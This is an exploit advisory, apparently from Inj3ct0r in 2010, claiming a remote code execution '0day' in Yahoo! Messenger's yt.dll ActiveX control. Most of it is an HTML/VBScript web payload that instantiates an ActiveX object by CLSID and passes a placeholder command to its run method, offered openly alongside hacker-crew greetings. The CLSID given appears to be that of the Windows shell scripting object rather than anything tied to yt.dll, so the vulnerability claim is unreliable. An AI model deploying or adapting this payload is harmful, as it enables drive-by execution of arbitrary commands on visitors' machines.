================================================================================
Yahoo! messenger (v10.0.0.525-us beta) yt.dll ActiveX Remote Code Execution 0day
================================================================================


##################################{In The Name Of Allah The Mercifull}###################### 
# Title : Yahoo! messenger (V 10.0.0.525-us)beta (yt.dll) 0day suffer from  ActiveX Remote Code Execution  
# Tested : Windows xp (sp3) 
## Author : R3d-D3v!L <X[at]hotmail.co.jp> ##
# Credits to : XP10_HACKER ((XP10.ME-xp10.com)) 
## Greetz : DOLLY-MERNA & DR_DAShER & JUPA & hetlar jaddah& Abo-ShA@D ## 
## all member at XP10.ME ## 
######################################################## 
 
infected bath : Program Files\Yahoo!\Companion\Installs\cpn0\yt.dll
 
reason of infected :
 
Function c (
    ByVal bstr  As String
)  As String
 
in (C) in  IYTHelpe
 
EXPLO!T:
 
<html> 
 
</font></b></p> 
 
<p> 
 
<object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8' id='target' 
 
></object> 
 
<script language='vbscript'> 
 
    
 
arg1="TYPE YOUR EXEcUT!ON CODE" 
 
    
 
target.run arg1 
 
    
 
</script></p> 


# Inj3ct0r.com [2010-07-26]